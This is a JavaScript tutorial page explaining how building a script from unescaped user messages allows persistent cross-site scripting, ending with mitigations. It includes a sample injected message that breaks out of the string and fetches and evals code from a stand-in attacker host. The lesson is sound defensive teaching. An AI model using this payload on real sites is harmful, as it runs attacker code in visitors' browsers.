Essential Books

Persistent Cross-site scripting from JavaScript string literals

suggest change

Let’s say that Bob owns a site that lets you post public messages.

The messages are loaded by a script that looks like this: 

addMessage("Message 1");
addMessage("Message 2");
addMessage("Message 3");
addMessage("Message 4");
addMessage("Message 5");
addMessage("Message 6");

The addMessage function adds a posted message to the DOM. However, in an effort to avoid XSS, any HTML in messages posted is escaped.

The script is generated on the server like this: 

for(var i = 0; i < messages.length; i++){
    script += "addMessage(\"" + messages[i] + "\");";
}

So alice posts a message that says: My mom said: "Life is good. Pie makes it better. ". Than when she previews the message, instead of seeing her message she sees an error in the console: 

Uncaught SyntaxError: missing ) after argument list

Why? Because the generated script looks like this: 

addMessage("My mom said: "Life is good. Pie makes it better. "");

That’s a syntax error. Than Alice posts: 

I like pie ");fetch("https://alice.evil/js_xss.js").then(x=>x.text()).then(eval);//

Then the generated script looks like: 

addMessage("I like pie ");fetch("https://alice.evil/js_xss.js").then(x=>x.text()).then(eval);//");

That adds the message I like pie, but it also downloads and runs https://alice.evil/js_xss.js whenever someone visits Bob’s site.

Mitigation:

  1. Pass the message posted into JSON.stringify()
  2. Instead of dynamically building a script, build a plain text file containing all the messages that is later fetched by the script
  3. Add a Content Security Policy that refuses to load active content from other domains
Found a mistake? Have a question or improvement idea? Let me know.

Feedback about page:

Feedback:
Optional: your email if you want me to get back to you:

Security issues:
* Security issues
* Reflected Cross-site scripting XSS
* Persistent Cross-site scripting XSS
* Persistent Cross-site scripting from JavaScript string literals
* Why scripts from other people can harm your website and its visitors
* Evaled JSON injection
Table Of Contents
0 Getting started
1 Comments
2 Basic data types
3 Built-in constants
4 Variables
5 Declarations and assignments
6 Reserved keywords
7 Data types in JavaScript
8 Strings
9 Escape sequences
10 Template Literals
11 Arrays
12 Objects
13 Prototypes objects
14 Classes
15 Variable coercion / conversion
16 Map
17 Set
18 Arithmetic Math
19 Bitwise operators
20 Bitwise operators
21 Unary Operators
22 Comparison operations
23 Conditions
24 Loops
25 Functions
26 Arrow functions
27 Date
28 Date comparison
29 Scope
30 AJAX
31 Promises
32 Regular Expression
33 Error Handling
34 Geolocation
35 Cookies
36 Intervals and timeouts
37 Generators
38 History of visited urls
39 Strict mode
40 Custom Elements
41 JSON
42 Binary Data
43 Web Storage
44 Fetch
45 Modules
46 Screen
47 Inheritance
48 Timestamps
49 Destructuring assignment
50 Web Worker
51 Debugging
52 Notifications API
53 WebSockets
54 Web Cryptography API
55 Async functions, async / await
56 Constructor functions
57 execCommand and contenteditable
58 Performance Tips
59 Design patterns
60 requestAnimationFrame
61 Method chaining
62 Global error handling in browsers
63 File API, blobs and FileReaders
64 Console
65 Tail call optimization
66 Detecting browser
67 Enumerations
68 Symbols
69 Localization
70 Selection API
71 Callbacks
72 Functional JavaScript
73 Modals
74 Data attributes
75 Event Loop
76 Events
77 Data manipulation
78 BOM Browser Object Model
79 Unit Testing
80 Linters for ensuring code quality
81 Automatic Semicolon Insertion
82 IndexedDB
83 Anti-patterns
84 Navigator Object
85 Modularization techniques
86 Proxy
87 Same origin policy, cross-origin communication
88 postMessage and MessageEvent
89 WeakMap
90 WeakSet
91 Behaviroal Design Patterns
92 Server-sent events
93 Async iterators
94 Namespacing
95 Evaluating JavaScript
96 Memory efficiency
97 How to make iterator usable inside async callback function
98 Context this
99 Setters and getters
100 Vibration API
101 Fluent API
102 Tilde
103 Security issues
104 Get and set CSS custom variables
105 Contributors